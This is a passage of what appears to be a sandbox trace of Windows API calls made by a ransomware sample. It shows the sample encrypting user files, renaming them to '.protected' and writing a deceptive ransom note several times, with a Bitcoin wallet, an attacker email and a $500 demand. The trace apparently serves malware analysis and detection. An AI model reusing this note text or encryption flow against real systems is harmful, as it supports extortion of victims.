dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.726] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.726] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".txt") returned 0x0 [0094.726] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.726] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".rar") returned 0x0 [0094.726] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.727] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".zip") returned 0x0 [0094.727] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0094.761] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.761] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x27cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0094.762] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.762] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.762] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.762] CloseHandle (hObject=0x150) returned 1 [0094.762] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected") returned 85 [0094.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.protected")) returned 1 [0094.763] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.763] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.763] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt") returned 81 [0094.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.776] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.776] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.777] lstrlenA (lpString="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") returned 684 [0094.777] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.777] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.777] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.777] CloseHandle (hObject=0x14c) returned 1 [0094.778] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.778] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.779] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt") returned 76 [0094.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.779] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.779] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.780] lstrlenA (lpString="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") returned 684 [0094.780] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.780] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.780] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.780] CloseHandle (hObject=0xd8) returned 1 [0094.781] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Windows") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files (x86)") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="$Recycle.bin") returned 1 [0094.781] lstrcmpiW (lpString1="Windows Sidebar", lpString2="System Volume Information") returned 1 [0094.781] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 60 [0094.781] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0094.781] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0094.781] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned 62 [0094.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.781] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.781] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.781] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.781] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.781] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.781] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\.") returned 62 [0094.782] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.782] 
FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.782] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.782] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.782] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.782] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.782] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.782] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\..") returned 63 [0094.782] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.782] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.782] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="Windows") returned -1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files") returned -1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files (x86)") returned -1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="$Recycle.bin") returned 1 [0094.782] lstrcmpiW (lpString1="Gadgets", lpString2="System Volume Information") returned -1 [0094.782] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 68 [0094.782] lstrcmpW (lpString1="Gadgets", lpString2=".") returned 1 [0094.782] lstrcmpW (lpString1="Gadgets", lpString2="..") returned 1 [0094.782] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned 70 [0094.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.782] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.782] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.782] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.782] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.782] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.783] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.") returned 70 [0094.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.783] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.783] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.783] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.783] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.783] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.783] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.783] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\..") returned 71 [0094.783] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.783] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.783] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.783] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt") returned 86 [0094.783] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.784] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.784] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.784] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.784] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.784] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.785] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.785] CloseHandle (hObject=0x14c) returned 1 [0094.785] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="Windows") returned -1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files") returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files (x86)") returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", 
lpString2="$Recycle.bin") returned 1 [0094.785] lstrcmpiW (lpString1="Settings.ini", lpString2="System Volume Information") returned -1 [0094.785] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.785] StrStrIW (lpFirst="Settings.ini", lpSrch=".protected") returned 0x0 [0094.785] lstrcmpW (lpString1="Settings.ini", lpString2="RESTORE_FILES.txt") returned 1 [0094.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.786] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.786] StrStrW (lpFirst="Settings.ini", lpSrch=".txt") returned 0x0 [0094.786] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.786] StrStrW (lpFirst="Settings.ini", lpSrch=".rar") returned 0x0 [0094.786] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0094.786] StrStrW (lpFirst="Settings.ini", lpSrch=".zip") returned 0x0 [0094.786] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x54, 
lpOverlapped=0x0) returned 1 [0094.787] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.787] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x54, lpOverlapped=0x0) returned 1 [0094.787] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.787] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.787] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.787] CloseHandle (hObject=0x14c) returned 1 [0094.787] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected") returned 83 [0094.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.protected")) returned 1 [0094.788] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.788] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.788] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt") returned 78 [0094.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.797] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.797] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.798] lstrlenA (lpString="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") returned 684 [0094.798] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.798] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.798] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.798] CloseHandle (hObject=0xd8) returned 1 [0094.798] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.798] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.799] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt") returned 62 [0094.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.800] lstrlenA (lpString="! SYSTEM SECURITY ALERT 